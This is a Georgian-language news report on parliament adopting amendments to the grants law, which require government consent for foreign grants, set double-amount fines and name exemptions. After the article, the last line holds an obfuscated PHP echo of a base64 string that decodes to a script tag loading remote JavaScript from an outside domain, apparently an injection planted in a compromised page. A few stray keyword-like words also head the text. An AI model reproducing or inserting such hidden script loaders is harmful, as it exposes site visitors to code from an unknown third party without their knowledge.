gorgia
ავერსი jaluzi

პარლამენტმა 82 ხმით ნულის წინააღმდეგ, მესამე მოსმენით მიიღო "გრანტების შესახებ" კანონში ცვლილებები, რომლის მიხედვითაც, ორგანიზაცია უცხოურ გრანტს ვერ მიიღებს, თუ მას არ ექნება „მთავრობის ან მთავრობის მიერ განსაზღვრული უფლებამოსილი პირის/ორგანოს თანხმობა“.

დონორი ორგანიზაცია ვალდებული იქნება წარადგინოს ხელშეკრულების პროექტი. „გრანტების შესახებ“ კანონში ჩნდება „აკრძალული გრანტის“ ცნება - ანუ დონორის მიერ ორგანიზაციის დაფინანსება, თუ მას არ ექნება მთავრობის თანხმობა.

მთავრობის მიერ გრანტის გაცემის თაობაზე თანხმობის მისაცემად 10-დღიანი ვადა განისაზღვრება. გასაჩივრების პროცესში, მთავრობის გადაწყვეტილება არ ჩერდება.

აკრძალული გრანტის მიღება გამოიწვევს გრანტის მიმღების დაჯარიმებას აღნიშნული გრანტის ორმაგი ოდენობით.

ამასთან, აკრძალული გრანტის გაცემისა და მიღების მონიტორინგს ანტიკორუფციული ბიურო განახორციელებს.

მთავრობის სავალდებულო თანხმობის წესი არ ვრცელდება საერთაშორისო სპორტული ასოციაციის, ფედერაციის და კომიტეტის მიერ გრანტის გაცემაზე, საქართველოს საზღვრებს გარეთ საშუალო და უმაღლესი განათლების მიღებისთვის და სამეცნიერო მუშაობისთვის გაცემულ ინდივიდუალურ სტიპენდიაზე, ასევე საქართველოში მოქმედი საერთაშორისო ორგანიზაციის მიერ გრანტის მიღებაზე.

109
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");